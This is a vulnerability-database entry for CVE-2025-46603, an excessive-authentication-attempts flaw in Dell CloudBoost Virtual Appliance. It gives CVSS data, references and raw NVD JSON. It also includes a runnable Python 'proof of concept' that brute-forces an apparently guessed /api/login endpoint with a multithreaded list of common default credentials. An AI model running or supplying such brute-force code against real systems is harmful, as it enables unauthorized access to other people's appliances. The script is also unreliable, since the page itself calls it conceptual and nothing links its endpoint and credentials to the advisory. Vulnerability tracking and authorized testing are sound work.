CVE-2025-46603

Description

Dell CloudBoost Virtual Appliance, versions 19.13.0.0 and prior, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.

CVSS Details

CVSS Score

7.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:cloudboost_virtual_appliance:*:*:*:*:*:*:*:* - VULNERABLE

Dell CloudBoost Virtual Appliance <= 19.13.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-46603 PoC - Dell CloudBoost Authentication Bypass
# Note: This is a conceptual PoC for educational and security testing purposes only
# Unauthorized access to systems is illegal

import requests
import sys
from concurrent.futures import ThreadPoolExecutor

TARGET_HOST = "https://target-cloudboost-host"
DEFAULT_PORTS = [443, 8443]
COMMON_CREDENTIALS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", "123456"),
    ("admin", "Dell123"),
    ("administrator", "administrator"),
    ("root", "root"),
    ("root", "calvin")
]

def test_authentication(host, port, username, password):
    """Test authentication endpoint with given credentials"""
    try:
        url = f"{host}:{port}/api/login"
        data = {"username": username, "password": password}
        response = requests.post(url, json=data, timeout=10, verify=False)
        
        if response.status_code == 200 and "token" in response.text:
            print(f"[SUCCESS] Valid credentials found: {username}:{password}")
            return True
        return False
    except Exception as e:
        print(f"[ERROR] {e}")
        return False

def brute_force_attack(host, max_threads=10):
    """Brute force attack - demonstrates lack of rate limiting"""
    print(f"[*] Starting brute force attack against {host}")
    print(f"[*] Testing {len(COMMON_CREDENTIALS)} credential pairs")
    
    tasks = []
    for port in DEFAULT_PORTS:
        for username, password in COMMON_CREDENTIALS:
            tasks.append((host, port, username, password))
    
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        results = executor.map(lambda t: test_authentication(*t), tasks)
        if any(results):
            print("[!] Authentication bypass successful - rate limiting not enforced")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        brute_force_attack(sys.argv[1])
    else:
        print("Usage: python cve-2025-46603-poc.py <target_host>")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-46603
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-46603
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-46603/
[4] VulDB https://vuldb.com/cve/CVE-2025-46603
[5] https://www.dell.com/support/kbdoc/en-us/000397417/dsa-2025-387-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-46603", "sourceIdentifier": "[email protected]", "published": "2025-12-05T19:15:48.233", "lastModified": "2026-01-16T21:18:14.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell CloudBoost Virtual Appliance, versions 19.13.0.0 and prior, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access."}, {"lang": "es", "value": "Dell CloudBoost Virtual Appliance, versiones 19.13.0.0 y anteriores, contiene una vulnerabilidad de Restricción Inadecuada de Intentos Excesivos de Autenticación. Un atacante no autenticado con acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que llevaría a un acceso no autorizado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:cloudboost_virtual_appliance:*:*:*:*:*:*:*:*", "versionEndExcluding": "19.13.0.2", "matchCriteriaId": "FBA69D9C-69D7-4516-B176-32E6C9D2B756"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000397417/dsa-2025-387-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}